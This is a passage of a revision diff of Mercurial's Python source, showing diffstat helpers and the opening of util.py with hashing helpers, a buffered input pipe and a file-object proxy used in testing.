2858 diffre = re.compile('^diff .*-r [a-z0-9]+\s(.*)$')
2858
2859
2859 results = []
2860 results = []
2860 filename, adds, removes, isbinary = None, 0, 0, False
2861 filename, adds, removes, isbinary = None, 0, 0, False
2861
2862
2862 def addresult():
2863 def addresult():
2863 if filename:
2864 if filename:
2864 results.append((filename, adds, removes, isbinary))
2865 results.append((filename, adds, removes, isbinary))
2865
2866
2866 # inheader is used to track if a line is in the
2867 # inheader is used to track if a line is in the
2867 # header portion of the diff. This helps properly account
2868 # header portion of the diff. This helps properly account
2868 # for lines that start with '--' or '++'
2869 # for lines that start with '--' or '++'
2869 inheader = False
2870 inheader = False
2870
2871
2871 for line in lines:
2872 for line in lines:
2872 if line.startswith('diff'):
2873 if line.startswith('diff'):
2873 addresult()
2874 addresult()
2874 # starting a new file diff
2875 # starting a new file diff
2875 # set numbers to 0 and reset inheader
2876 # set numbers to 0 and reset inheader
2876 inheader = True
2877 inheader = True
2877 adds, removes, isbinary = 0, 0, False
2878 adds, removes, isbinary = 0, 0, False
2878 if line.startswith('diff --git a/'):
2879 if line.startswith('diff --git a/'):
2879 filename = gitre.search(line).group(2)
2880 filename = gitre.search(line).group(2)
2880 elif line.startswith('diff -r'):
2881 elif line.startswith('diff -r'):
2881 # format: "diff -r ... -r ... filename"
2882 # format: "diff -r ... -r ... filename"
2882 filename = diffre.search(line).group(1)
2883 filename = diffre.search(line).group(1)
2883 elif line.startswith('@@'):
2884 elif line.startswith('@@'):
2884 inheader = False
2885 inheader = False
2885 elif line.startswith('+') and not inheader:
2886 elif line.startswith('+') and not inheader:
2886 adds += 1
2887 adds += 1
2887 elif line.startswith('-') and not inheader:
2888 elif line.startswith('-') and not inheader:
2888 removes += 1
2889 removes += 1
2889 elif (line.startswith('GIT binary patch') or
2890 elif (line.startswith('GIT binary patch') or
2890 line.startswith('Binary file')):
2891 line.startswith('Binary file')):
2891 isbinary = True
2892 isbinary = True
2892 addresult()
2893 addresult()
2893 return results
2894 return results
2894
2895
2895 def diffstat(lines, width=80):
2896 def diffstat(lines, width=80):
2896 output = []
2897 output = []
2897 stats = diffstatdata(lines)
2898 stats = diffstatdata(lines)
2898 maxname, maxtotal, totaladds, totalremoves, hasbinary = diffstatsum(stats)
2899 maxname, maxtotal, totaladds, totalremoves, hasbinary = diffstatsum(stats)
2899
2900
2900 countwidth = len(str(maxtotal))
2901 countwidth = len(str(maxtotal))
2901 if hasbinary and countwidth < 3:
2902 if hasbinary and countwidth < 3:
2902 countwidth = 3
2903 countwidth = 3
2903 graphwidth = width - countwidth - maxname - 6
2904 graphwidth = width - countwidth - maxname - 6
2904 if graphwidth < 10:
2905 if graphwidth < 10:
2905 graphwidth = 10
2906 graphwidth = 10
2906
2907
2907 def scale(i):
2908 def scale(i):
2908 if maxtotal <= graphwidth:
2909 if maxtotal <= graphwidth:
2909 return i
2910 return i
2910 # If diffstat runs out of room it doesn't print anything,
2911 # If diffstat runs out of room it doesn't print anything,
2911 # which isn't very useful, so always print at least one + or -
2912 # which isn't very useful, so always print at least one + or -
2912 # if there were at least some changes.
2913 # if there were at least some changes.
2913 return max(i * graphwidth // maxtotal, int(bool(i)))
2914 return max(i * graphwidth // maxtotal, int(bool(i)))
2914
2915
2915 for filename, adds, removes, isbinary in stats:
2916 for filename, adds, removes, isbinary in stats:
2916 if isbinary:
2917 if isbinary:
2917 count = 'Bin'
2918 count = 'Bin'
2918 else:
2919 else:
2919 count = '%d' % (adds + removes)
2920 count = '%d' % (adds + removes)
2920 pluses = '+' * scale(adds)
2921 pluses = '+' * scale(adds)
2921 minuses = '-' * scale(removes)
2922 minuses = '-' * scale(removes)
2922 output.append(' %s%s | %*s %s%s\n' %
2923 output.append(' %s%s | %*s %s%s\n' %
2923 (filename, ' ' * (maxname - encoding.colwidth(filename)),
2924 (filename, ' ' * (maxname - encoding.colwidth(filename)),
2924 countwidth, count, pluses, minuses))
2925 countwidth, count, pluses, minuses))
2925
2926
2926 if stats:
2927 if stats:
2927 output.append(_(' %d files changed, %d insertions(+), '
2928 output.append(_(' %d files changed, %d insertions(+), '
2928 '%d deletions(-)\n')
2929 '%d deletions(-)\n')
2929 % (len(stats), totaladds, totalremoves))
2930 % (len(stats), totaladds, totalremoves))
2930
2931
2931 return ''.join(output)
2932 return ''.join(output)
2932
2933
2933 def diffstatui(*args, **kw):
2934 def diffstatui(*args, **kw):
2934 '''like diffstat(), but yields 2-tuples of (output, label) for
2935 '''like diffstat(), but yields 2-tuples of (output, label) for
2935 ui.write()
2936 ui.write()
2936 '''
2937 '''
2937
2938
2938 for line in diffstat(*args, **kw).splitlines():
2939 for line in diffstat(*args, **kw).splitlines():
2939 if line and line[-1] in '+-':
2940 if line and line[-1] in '+-':
2940 name, graph = line.rsplit(' ', 1)
2941 name, graph = line.rsplit(' ', 1)
2941 yield (name + ' ', '')
2942 yield (name + ' ', '')
2942 m = re.search(br'\++', graph)
2943 m = re.search(br'\++', graph)
2943 if m:
2944 if m:
2944 yield (m.group(0), 'diffstat.inserted')
2945 yield (m.group(0), 'diffstat.inserted')
2945 m = re.search(br'-+', graph)
2946 m = re.search(br'-+', graph)
2946 if m:
2947 if m:
2947 yield (m.group(0), 'diffstat.deleted')
2948 yield (m.group(0), 'diffstat.deleted')
2948 else:
2949 else:
2949 yield (line, '')
2950 yield (line, '')
2950 yield ('\n', '')
2951 yield ('\n', '')
@@ -1,3789 +1,3790 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import collections
20 import collections
21 import contextlib
21 import contextlib
22 import errno
22 import errno
23 import gc
23 import gc
24 import hashlib
24 import hashlib
25 import itertools
25 import itertools
26 import mmap
26 import mmap
27 import os
27 import os
28 import platform as pyplatform
28 import platform as pyplatform
29 import re as remod
29 import re as remod
30 import shutil
30 import shutil
31 import socket
31 import socket
32 import stat
32 import stat
33 import sys
33 import sys
34 import time
34 import time
35 import traceback
35 import traceback
36 import warnings
36 import warnings
37 import zlib
37 import zlib
38
38
39 from . import (
39 from . import (
40 encoding,
40 encoding,
41 error,
41 error,
42 i18n,
42 i18n,
43 node as nodemod,
43 node as nodemod,
44 policy,
44 policy,
45 pycompat,
45 pycompat,
46 urllibcompat,
46 urllibcompat,
47 )
47 )
48 from .utils import (
48 from .utils import (
49 procutil,
49 procutil,
50 stringutil,
50 stringutil,
51 )
51 )
52
52
53 base85 = policy.importmod(r'base85')
53 base85 = policy.importmod(r'base85')
54 osutil = policy.importmod(r'osutil')
54 osutil = policy.importmod(r'osutil')
55 parsers = policy.importmod(r'parsers')
55 parsers = policy.importmod(r'parsers')
56
56
57 b85decode = base85.b85decode
57 b85decode = base85.b85decode
58 b85encode = base85.b85encode
58 b85encode = base85.b85encode
59
59
60 cookielib = pycompat.cookielib
60 cookielib = pycompat.cookielib
61 httplib = pycompat.httplib
61 httplib = pycompat.httplib
62 pickle = pycompat.pickle
62 pickle = pycompat.pickle
63 safehasattr = pycompat.safehasattr
63 safehasattr = pycompat.safehasattr
64 socketserver = pycompat.socketserver
64 socketserver = pycompat.socketserver
65 bytesio = pycompat.bytesio
65 bytesio = pycompat.bytesio
66 # TODO deprecate stringio name, as it is a lie on Python 3.
66 # TODO deprecate stringio name, as it is a lie on Python 3.
67 stringio = bytesio
67 stringio = bytesio
68 xmlrpclib = pycompat.xmlrpclib
68 xmlrpclib = pycompat.xmlrpclib
69
69
70 httpserver = urllibcompat.httpserver
70 httpserver = urllibcompat.httpserver
71 urlerr = urllibcompat.urlerr
71 urlerr = urllibcompat.urlerr
72 urlreq = urllibcompat.urlreq
72 urlreq = urllibcompat.urlreq
73
73
74 # workaround for win32mbcs
74 # workaround for win32mbcs
75 _filenamebytestr = pycompat.bytestr
75 _filenamebytestr = pycompat.bytestr
76
76
77 if pycompat.iswindows:
77 if pycompat.iswindows:
78 from . import windows as platform
78 from . import windows as platform
79 else:
79 else:
80 from . import posix as platform
80 from . import posix as platform
81
81
82 _ = i18n._
82 _ = i18n._
83
83
84 bindunixsocket = platform.bindunixsocket
84 bindunixsocket = platform.bindunixsocket
85 cachestat = platform.cachestat
85 cachestat = platform.cachestat
86 checkexec = platform.checkexec
86 checkexec = platform.checkexec
87 checklink = platform.checklink
87 checklink = platform.checklink
88 copymode = platform.copymode
88 copymode = platform.copymode
89 expandglobs = platform.expandglobs
89 expandglobs = platform.expandglobs
90 getfsmountpoint = platform.getfsmountpoint
90 getfsmountpoint = platform.getfsmountpoint
91 getfstype = platform.getfstype
91 getfstype = platform.getfstype
92 groupmembers = platform.groupmembers
92 groupmembers = platform.groupmembers
93 groupname = platform.groupname
93 groupname = platform.groupname
94 isexec = platform.isexec
94 isexec = platform.isexec
95 isowner = platform.isowner
95 isowner = platform.isowner
96 listdir = osutil.listdir
96 listdir = osutil.listdir
97 localpath = platform.localpath
97 localpath = platform.localpath
98 lookupreg = platform.lookupreg
98 lookupreg = platform.lookupreg
99 makedir = platform.makedir
99 makedir = platform.makedir
100 nlinks = platform.nlinks
100 nlinks = platform.nlinks
101 normpath = platform.normpath
101 normpath = platform.normpath
102 normcase = platform.normcase
102 normcase = platform.normcase
103 normcasespec = platform.normcasespec
103 normcasespec = platform.normcasespec
104 normcasefallback = platform.normcasefallback
104 normcasefallback = platform.normcasefallback
105 openhardlinks = platform.openhardlinks
105 openhardlinks = platform.openhardlinks
106 oslink = platform.oslink
106 oslink = platform.oslink
107 parsepatchoutput = platform.parsepatchoutput
107 parsepatchoutput = platform.parsepatchoutput
108 pconvert = platform.pconvert
108 pconvert = platform.pconvert
109 poll = platform.poll
109 poll = platform.poll
110 posixfile = platform.posixfile
110 posixfile = platform.posixfile
111 rename = platform.rename
111 rename = platform.rename
112 removedirs = platform.removedirs
112 removedirs = platform.removedirs
113 samedevice = platform.samedevice
113 samedevice = platform.samedevice
114 samefile = platform.samefile
114 samefile = platform.samefile
115 samestat = platform.samestat
115 samestat = platform.samestat
116 setflags = platform.setflags
116 setflags = platform.setflags
117 split = platform.split
117 split = platform.split
118 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
118 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
119 statisexec = platform.statisexec
119 statisexec = platform.statisexec
120 statislink = platform.statislink
120 statislink = platform.statislink
121 umask = platform.umask
121 umask = platform.umask
122 unlink = platform.unlink
122 unlink = platform.unlink
123 username = platform.username
123 username = platform.username
124
124
125 try:
125 try:
126 recvfds = osutil.recvfds
126 recvfds = osutil.recvfds
127 except AttributeError:
127 except AttributeError:
128 pass
128 pass
129
129
130 # Python compatibility
130 # Python compatibility
131
131
132 _notset = object()
132 _notset = object()
133
133
134 def _rapply(f, xs):
134 def _rapply(f, xs):
135 if xs is None:
135 if xs is None:
136 # assume None means non-value of optional data
136 # assume None means non-value of optional data
137 return xs
137 return xs
138 if isinstance(xs, (list, set, tuple)):
138 if isinstance(xs, (list, set, tuple)):
139 return type(xs)(_rapply(f, x) for x in xs)
139 return type(xs)(_rapply(f, x) for x in xs)
140 if isinstance(xs, dict):
140 if isinstance(xs, dict):
141 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
141 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
142 return f(xs)
142 return f(xs)
143
143
144 def rapply(f, xs):
144 def rapply(f, xs):
145 """Apply function recursively to every item preserving the data structure
145 """Apply function recursively to every item preserving the data structure
146
146
147 >>> def f(x):
147 >>> def f(x):
148 ... return 'f(%s)' % x
148 ... return 'f(%s)' % x
149 >>> rapply(f, None) is None
149 >>> rapply(f, None) is None
150 True
150 True
151 >>> rapply(f, 'a')
151 >>> rapply(f, 'a')
152 'f(a)'
152 'f(a)'
153 >>> rapply(f, {'a'}) == {'f(a)'}
153 >>> rapply(f, {'a'}) == {'f(a)'}
154 True
154 True
155 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
155 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
156 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
156 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
157
157
158 >>> xs = [object()]
158 >>> xs = [object()]
159 >>> rapply(pycompat.identity, xs) is xs
159 >>> rapply(pycompat.identity, xs) is xs
160 True
160 True
161 """
161 """
162 if f is pycompat.identity:
162 if f is pycompat.identity:
163 # fast path mainly for py2
163 # fast path mainly for py2
164 return xs
164 return xs
165 return _rapply(f, xs)
165 return _rapply(f, xs)
166
166
167 def bitsfrom(container):
167 def bitsfrom(container):
168 bits = 0
168 bits = 0
169 for bit in container:
169 for bit in container:
170 bits |= bit
170 bits |= bit
171 return bits
171 return bits
172
172
173 # python 2.6 still have deprecation warning enabled by default. We do not want
173 # python 2.6 still have deprecation warning enabled by default. We do not want
174 # to display anything to standard user so detect if we are running test and
174 # to display anything to standard user so detect if we are running test and
175 # only use python deprecation warning in this case.
175 # only use python deprecation warning in this case.
176 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
176 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
177 if _dowarn:
177 if _dowarn:
178 # explicitly unfilter our warning for python 2.7
178 # explicitly unfilter our warning for python 2.7
179 #
179 #
180 # The option of setting PYTHONWARNINGS in the test runner was investigated.
180 # The option of setting PYTHONWARNINGS in the test runner was investigated.
181 # However, module name set through PYTHONWARNINGS was exactly matched, so
181 # However, module name set through PYTHONWARNINGS was exactly matched, so
182 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
182 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
183 # makes the whole PYTHONWARNINGS thing useless for our usecase.
183 # makes the whole PYTHONWARNINGS thing useless for our usecase.
184 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
184 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
185 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
185 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
186 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
186 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
187 if _dowarn and pycompat.ispy3:
187 if _dowarn and pycompat.ispy3:
188 # silence warning emitted by passing user string to re.sub()
188 # silence warning emitted by passing user string to re.sub()
189 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
189 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
190 r'mercurial')
190 r'mercurial')
191 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
191 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
192 DeprecationWarning, r'mercurial')
192 DeprecationWarning, r'mercurial')
193 # TODO: reinvent imp.is_frozen()
193 # TODO: reinvent imp.is_frozen()
194 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
194 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
195 DeprecationWarning, r'mercurial')
195 DeprecationWarning, r'mercurial')
196
196
197 def nouideprecwarn(msg, version, stacklevel=1):
197 def nouideprecwarn(msg, version, stacklevel=1):
198 """Issue an python native deprecation warning
198 """Issue an python native deprecation warning
199
199
200 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
200 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
201 """
201 """
202 if _dowarn:
202 if _dowarn:
203 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
203 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
204 " update your code.)") % version
204 " update your code.)") % version
205 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
205 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
206
206
207 DIGESTS = {
207 DIGESTS = {
208 'md5': hashlib.md5,
208 'md5': hashlib.md5,
209 'sha1': hashlib.sha1,
209 'sha1': hashlib.sha1,
210 'sha512': hashlib.sha512,
210 'sha512': hashlib.sha512,
211 }
211 }
212 # List of digest types from strongest to weakest
212 # List of digest types from strongest to weakest
213 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
213 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
214
214
215 for k in DIGESTS_BY_STRENGTH:
215 for k in DIGESTS_BY_STRENGTH:
216 assert k in DIGESTS
216 assert k in DIGESTS
217
217
218 class digester(object):
218 class digester(object):
219 """helper to compute digests.
219 """helper to compute digests.
220
220
221 This helper can be used to compute one or more digests given their name.
221 This helper can be used to compute one or more digests given their name.
222
222
223 >>> d = digester([b'md5', b'sha1'])
223 >>> d = digester([b'md5', b'sha1'])
224 >>> d.update(b'foo')
224 >>> d.update(b'foo')
225 >>> [k for k in sorted(d)]
225 >>> [k for k in sorted(d)]
226 ['md5', 'sha1']
226 ['md5', 'sha1']
227 >>> d[b'md5']
227 >>> d[b'md5']
228 'acbd18db4cc2f85cedef654fccc4a4d8'
228 'acbd18db4cc2f85cedef654fccc4a4d8'
229 >>> d[b'sha1']
229 >>> d[b'sha1']
230 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
230 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
231 >>> digester.preferred([b'md5', b'sha1'])
231 >>> digester.preferred([b'md5', b'sha1'])
232 'sha1'
232 'sha1'
233 """
233 """
234
234
235 def __init__(self, digests, s=''):
235 def __init__(self, digests, s=''):
236 self._hashes = {}
236 self._hashes = {}
237 for k in digests:
237 for k in digests:
238 if k not in DIGESTS:
238 if k not in DIGESTS:
239 raise error.Abort(_('unknown digest type: %s') % k)
239 raise error.Abort(_('unknown digest type: %s') % k)
240 self._hashes[k] = DIGESTS[k]()
240 self._hashes[k] = DIGESTS[k]()
241 if s:
241 if s:
242 self.update(s)
242 self.update(s)
243
243
244 def update(self, data):
244 def update(self, data):
245 for h in self._hashes.values():
245 for h in self._hashes.values():
246 h.update(data)
246 h.update(data)
247
247
248 def __getitem__(self, key):
248 def __getitem__(self, key):
249 if key not in DIGESTS:
249 if key not in DIGESTS:
250 raise error.Abort(_('unknown digest type: %s') % k)
250 raise error.Abort(_('unknown digest type: %s') % k)
251 return nodemod.hex(self._hashes[key].digest())
251 return nodemod.hex(self._hashes[key].digest())
252
252
253 def __iter__(self):
253 def __iter__(self):
254 return iter(self._hashes)
254 return iter(self._hashes)
255
255
256 @staticmethod
256 @staticmethod
257 def preferred(supported):
257 def preferred(supported):
258 """returns the strongest digest type in both supported and DIGESTS."""
258 """returns the strongest digest type in both supported and DIGESTS."""
259
259
260 for k in DIGESTS_BY_STRENGTH:
260 for k in DIGESTS_BY_STRENGTH:
261 if k in supported:
261 if k in supported:
262 return k
262 return k
263 return None
263 return None
264
264
265 class digestchecker(object):
265 class digestchecker(object):
266 """file handle wrapper that additionally checks content against a given
266 """file handle wrapper that additionally checks content against a given
267 size and digests.
267 size and digests.
268
268
269 d = digestchecker(fh, size, {'md5': '...'})
269 d = digestchecker(fh, size, {'md5': '...'})
270
270
271 When multiple digests are given, all of them are validated.
271 When multiple digests are given, all of them are validated.
272 """
272 """
273
273
274 def __init__(self, fh, size, digests):
274 def __init__(self, fh, size, digests):
275 self._fh = fh
275 self._fh = fh
276 self._size = size
276 self._size = size
277 self._got = 0
277 self._got = 0
278 self._digests = dict(digests)
278 self._digests = dict(digests)
279 self._digester = digester(self._digests.keys())
279 self._digester = digester(self._digests.keys())
280
280
281 def read(self, length=-1):
281 def read(self, length=-1):
282 content = self._fh.read(length)
282 content = self._fh.read(length)
283 self._digester.update(content)
283 self._digester.update(content)
284 self._got += len(content)
284 self._got += len(content)
285 return content
285 return content
286
286
287 def validate(self):
287 def validate(self):
288 if self._size != self._got:
288 if self._size != self._got:
289 raise error.Abort(_('size mismatch: expected %d, got %d') %
289 raise error.Abort(_('size mismatch: expected %d, got %d') %
290 (self._size, self._got))
290 (self._size, self._got))
291 for k, v in self._digests.items():
291 for k, v in self._digests.items():
292 if v != self._digester[k]:
292 if v != self._digester[k]:
293 # i18n: first parameter is a digest name
293 # i18n: first parameter is a digest name
294 raise error.Abort(_('%s mismatch: expected %s, got %s') %
294 raise error.Abort(_('%s mismatch: expected %s, got %s') %
295 (k, v, self._digester[k]))
295 (k, v, self._digester[k]))
296
296
297 try:
297 try:
298 buffer = buffer
298 buffer = buffer
299 except NameError:
299 except NameError:
300 def buffer(sliceable, offset=0, length=None):
300 def buffer(sliceable, offset=0, length=None):
301 if length is not None:
301 if length is not None:
302 return memoryview(sliceable)[offset:offset + length]
302 return memoryview(sliceable)[offset:offset + length]
303 return memoryview(sliceable)[offset:]
303 return memoryview(sliceable)[offset:]
304
304
305 _chunksize = 4096
305 _chunksize = 4096
306
306
307 class bufferedinputpipe(object):
307 class bufferedinputpipe(object):
308 """a manually buffered input pipe
308 """a manually buffered input pipe
309
309
310 Python will not let us use buffered IO and lazy reading with 'polling' at
310 Python will not let us use buffered IO and lazy reading with 'polling' at
311 the same time. We cannot probe the buffer state and select will not detect
311 the same time. We cannot probe the buffer state and select will not detect
312 that data are ready to read if they are already buffered.
312 that data are ready to read if they are already buffered.
313
313
314 This class let us work around that by implementing its own buffering
314 This class let us work around that by implementing its own buffering
315 (allowing efficient readline) while offering a way to know if the buffer is
315 (allowing efficient readline) while offering a way to know if the buffer is
316 empty from the output (allowing collaboration of the buffer with polling).
316 empty from the output (allowing collaboration of the buffer with polling).
317
317
318 This class lives in the 'util' module because it makes use of the 'os'
318 This class lives in the 'util' module because it makes use of the 'os'
319 module from the python stdlib.
319 module from the python stdlib.
320 """
320 """
321 def __new__(cls, fh):
321 def __new__(cls, fh):
322 # If we receive a fileobjectproxy, we need to use a variation of this
322 # If we receive a fileobjectproxy, we need to use a variation of this
323 # class that notifies observers about activity.
323 # class that notifies observers about activity.
324 if isinstance(fh, fileobjectproxy):
324 if isinstance(fh, fileobjectproxy):
325 cls = observedbufferedinputpipe
325 cls = observedbufferedinputpipe
326
326
327 return super(bufferedinputpipe, cls).__new__(cls)
327 return super(bufferedinputpipe, cls).__new__(cls)
328
328
329 def __init__(self, input):
329 def __init__(self, input):
330 self._input = input
330 self._input = input
331 self._buffer = []
331 self._buffer = []
332 self._eof = False
332 self._eof = False
333 self._lenbuf = 0
333 self._lenbuf = 0
334
334
335 @property
335 @property
336 def hasbuffer(self):
336 def hasbuffer(self):
337 """True is any data is currently buffered
337 """True is any data is currently buffered
338
338
339 This will be used externally a pre-step for polling IO. If there is
339 This will be used externally a pre-step for polling IO. If there is
340 already data then no polling should be set in place."""
340 already data then no polling should be set in place."""
341 return bool(self._buffer)
341 return bool(self._buffer)
342
342
343 @property
343 @property
344 def closed(self):
344 def closed(self):
345 return self._input.closed
345 return self._input.closed
346
346
347 def fileno(self):
347 def fileno(self):
348 return self._input.fileno()
348 return self._input.fileno()
349
349
350 def close(self):
350 def close(self):
351 return self._input.close()
351 return self._input.close()
352
352
353 def read(self, size):
353 def read(self, size):
354 while (not self._eof) and (self._lenbuf < size):
354 while (not self._eof) and (self._lenbuf < size):
355 self._fillbuffer()
355 self._fillbuffer()
356 return self._frombuffer(size)
356 return self._frombuffer(size)
357
357
358 def readline(self, *args, **kwargs):
358 def readline(self, *args, **kwargs):
359 if 1 < len(self._buffer):
359 if 1 < len(self._buffer):
360 # this should not happen because both read and readline end with a
360 # this should not happen because both read and readline end with a
361 # _frombuffer call that collapse it.
361 # _frombuffer call that collapse it.
362 self._buffer = [''.join(self._buffer)]
362 self._buffer = [''.join(self._buffer)]
363 self._lenbuf = len(self._buffer[0])
363 self._lenbuf = len(self._buffer[0])
364 lfi = -1
364 lfi = -1
365 if self._buffer:
365 if self._buffer:
366 lfi = self._buffer[-1].find('\n')
366 lfi = self._buffer[-1].find('\n')
367 while (not self._eof) and lfi < 0:
367 while (not self._eof) and lfi < 0:
368 self._fillbuffer()
368 self._fillbuffer()
369 if self._buffer:
369 if self._buffer:
370 lfi = self._buffer[-1].find('\n')
370 lfi = self._buffer[-1].find('\n')
371 size = lfi + 1
371 size = lfi + 1
372 if lfi < 0: # end of file
372 if lfi < 0: # end of file
373 size = self._lenbuf
373 size = self._lenbuf
374 elif 1 < len(self._buffer):
374 elif 1 < len(self._buffer):
375 # we need to take previous chunks into account
375 # we need to take previous chunks into account
376 size += self._lenbuf - len(self._buffer[-1])
376 size += self._lenbuf - len(self._buffer[-1])
377 return self._frombuffer(size)
377 return self._frombuffer(size)
378
378
379 def _frombuffer(self, size):
379 def _frombuffer(self, size):
380 """return at most 'size' data from the buffer
380 """return at most 'size' data from the buffer
381
381
382 The data are removed from the buffer."""
382 The data are removed from the buffer."""
383 if size == 0 or not self._buffer:
383 if size == 0 or not self._buffer:
384 return ''
384 return ''
385 buf = self._buffer[0]
385 buf = self._buffer[0]
386 if 1 < len(self._buffer):
386 if 1 < len(self._buffer):
387 buf = ''.join(self._buffer)
387 buf = ''.join(self._buffer)
388
388
389 data = buf[:size]
389 data = buf[:size]
390 buf = buf[len(data):]
390 buf = buf[len(data):]
391 if buf:
391 if buf:
392 self._buffer = [buf]
392 self._buffer = [buf]
393 self._lenbuf = len(buf)
393 self._lenbuf = len(buf)
394 else:
394 else:
395 self._buffer = []
395 self._buffer = []
396 self._lenbuf = 0
396 self._lenbuf = 0
397 return data
397 return data
398
398
399 def _fillbuffer(self):
399 def _fillbuffer(self):
400 """read data to the buffer"""
400 """read data to the buffer"""
401 data = os.read(self._input.fileno(), _chunksize)
401 data = os.read(self._input.fileno(), _chunksize)
402 if not data:
402 if not data:
403 self._eof = True
403 self._eof = True
404 else:
404 else:
405 self._lenbuf += len(data)
405 self._lenbuf += len(data)
406 self._buffer.append(data)
406 self._buffer.append(data)
407
407
408 return data
408 return data
409
409
410 def mmapread(fp):
410 def mmapread(fp):
411 try:
411 try:
412 fd = getattr(fp, 'fileno', lambda: fp)()
412 fd = getattr(fp, 'fileno', lambda: fp)()
413 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
413 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
414 except ValueError:
414 except ValueError:
415 # Empty files cannot be mmapped, but mmapread should still work. Check
415 # Empty files cannot be mmapped, but mmapread should still work. Check
416 # if the file is empty, and if so, return an empty buffer.
416 # if the file is empty, and if so, return an empty buffer.
417 if os.fstat(fd).st_size == 0:
417 if os.fstat(fd).st_size == 0:
418 return ''
418 return ''
419 raise
419 raise
420
420
421 class fileobjectproxy(object):
421 class fileobjectproxy(object):
422 """A proxy around file objects that tells a watcher when events occur.
422 """A proxy around file objects that tells a watcher when events occur.
423
423
424 This type is intended to only be used for testing purposes. Think hard
424 This type is intended to only be used for testing purposes. Think hard
425 before using it in important code.
425 before using it in important code.
426 """
426 """
427 __slots__ = (
427 __slots__ = (
428 r'_orig',
428 r'_orig',
429 r'_observer',
429 r'_observer',
430 )
430 )
431
431
432 def __init__(self, fh, observer):
432 def __init__(self, fh, observer):
433 object.__setattr__(self, r'_orig', fh)
433 object.__setattr__(self, r'_orig', fh)
434 object.__setattr__(self, r'_observer', observer)
434 object.__setattr__(self, r'_observer', observer)
435
435
436 def __getattribute__(self, name):
436 def __getattribute__(self, name):
437 ours = {
437 ours = {
438 r'_observer',
438 r'_observer',
439
439
440 # IOBase
440 # IOBase
441 r'close',
441 r'close',
442 # closed if a property
442 # closed if a property
443 r'fileno',
443 r'fileno',
444 r'flush',
444 r'flush',
445 r'isatty',
445 r'isatty',
446 r'readable',
446 r'readable',
447 r'readline',
447 r'readline',
448 r'readlines',
448 r'readlines',
449 r'seek',
449 r'seek',
450 r'seekable',
450 r'seekable',
451 r'tell',
451 r'tell',
452 r'truncate',
452 r'truncate',
453 r'writable',
453 r'writable',
454 r'writelines',
454 r'writelines',
455 # RawIOBase
455 # RawIOBase
456 r'read',
456 r'read',
457 r'readall',
457 r'readall',
458 r'readinto',
458 r'readinto',
459 r'write',
459 r'write',
460 # BufferedIOBase
460 # BufferedIOBase
461 # raw is a property
461 # raw is a property
462 r'detach',
462 r'detach',
463 # read defined above
463 # read defined above
464 r'read1',
464 r'read1',
465 # readinto defined above
465 # readinto defined above
466 # write defined above
466 # write defined above
467 }
467 }
468
468
469 # We only observe some methods.
469 # We only observe some methods.
470 if name in ours:
470 if name in ours:
471 return object.__getattribute__(self, name)
471 return object.__getattribute__(self, name)
472
472
473 return getattr(object.__getattribute__(self, r'_orig'), name)
473 return getattr(object.__getattribute__(self, r'_orig'), name)
474
474
475 def __nonzero__(self):
475 def __nonzero__(self):
476 return bool(object.__getattribute__(self, r'_orig'))
476 return bool(object.__getattribute__(self, r'_orig'))
477
477
478 __bool__ = __nonzero__
478 __bool__ = __nonzero__
479
479
480 def __delattr__(self, name):
480 def __delattr__(self, name):
481 return delattr(object.__getattribute__(self, r'_orig'), name)
